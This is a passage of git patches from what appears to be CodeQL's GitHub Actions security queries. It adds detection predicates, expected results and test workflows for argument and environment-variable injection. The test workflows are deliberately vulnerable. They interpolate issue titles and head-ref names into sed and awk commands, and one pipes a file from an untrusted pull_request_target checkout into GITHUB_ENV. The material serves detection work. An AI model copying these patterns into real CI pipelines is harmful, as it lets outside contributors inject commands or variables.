.github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -1306,7 +1324,7 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 3f2f30a78a0..09e540a0f1b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -17,6 +17,14 @@ jobs: - run: awk "BEGIN {$TITLE}" - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | - # We consider | as a shell pipe so this one is not reported yet until - # we can better identify all the commands in a shell script sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + - run: | + sed -e 's##${TITLE}#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##TITLE#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index b5d25bf0d13..b5df9a2cbd3 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | @@ -10,6 +12,9 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | @@ -17,3 +22,6 @@ subpaths | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index dfbf87174cc..73413f51a39 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | @@ -10,5 +12,8 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select From 90efdc7deb85f3074f595dd4985ca7000d5820dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:47:16 +0200 Subject: [PATCH 0447/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3a09bb01674..1c4415a305d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.30 +version: 0.1.31 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b89b197da04..9b49717942b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.30 +version: 0.1.31 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8cf1a6afa7755cedad993fec7d9957023abda72f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 15:48:57 +0200 Subject: [PATCH 0448/1267] feat(bash): Add support for `cat hazelcast/.github/java-config.env >> $GITHUB_ENV` --- ql/lib/codeql/actions/Helper.qll | 26 ++++++++ .../security/EnvPathInjectionQuery.qll | 43 ++++++++----- .../actions/security/EnvVarInjectionQuery.qll | 48 ++++++++++----- .../security/OutputClobberingQuery.qll | 60 ++++++++++++------- .../CWE-077/.github/workflows/test10.yml | 28 +++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 ++ .../CWE-077/EnvVarInjectionMedium.expected | 3 + 7 files changed, 158 insertions(+), 54 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f177c645dbd..2953817de6b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -212,6 +212,32 @@ predicate writeToGitHubPath(Run run, string content) { extractFileWrite(run.getScript(), "GITHUB_PATH", content) } +/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ +bindingset[script, file_var] +predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) +} + +predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) +} + +predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) +} + +predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) +} + predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index fc45b8c041d..40c0c7da9eb 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources @@ -16,27 +17,39 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubPath(run, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_PATH + fileToGitHubPath(run, _) + or + exists(string value | + writeToGitHubPath(run, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f7a9283f800..4f54f38f274 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources @@ -12,33 +13,48 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.env >> $GITHUB_ENV * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_ENV + fileToGitHubEnv(run, _) + or + exists(string content, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + // e.g. + // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4fe3268c00a..af8f7af089d 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources @@ -12,40 +13,53 @@ abstract class OutputClobberingSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.vars >> $GITHUB_OUTPUT * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT * echo "sha=$(> $GITHUB_OUTPUT */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and - not key2 = key - ) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.vars >> $GITHUB_OUTPUT + fileToGitHubOutput(run, _) + or + exists(string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml new file mode 100644 index 00000000000..f43a12cb42a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -0,0 +1,28 @@ +name: Build and Dockerize + +on: + pull_request_target: + +jobs: + build: + name: Test + runs-on: ubuntu-latest + steps: + - name: Decide Which 'ref' To Checkout + id: decide-ref + run: | + if [[ "${{github.event_name}}" == "pull_request_target" ]]; then + echo "ref=refs/pull/${{ github.event.pull_request.number }}/merge" >> $GITHUB_OUTPUT + else + echo "ref=${{github.ref}}" >> $GITHUB_OUTPUT + fi + + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{steps.decide-ref.outputs.ref}} + path: "foo" + + - name: Read Java Config + run: cat foo/.github/java-config.env >> $GITHUB_ENV + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 7d92032f00b..359275aef43 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -58,6 +59,8 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ 